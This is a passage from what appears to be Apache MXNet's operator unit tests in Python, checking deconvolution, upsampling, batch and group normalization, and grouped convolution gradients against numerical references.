args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out.reshape(dshape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
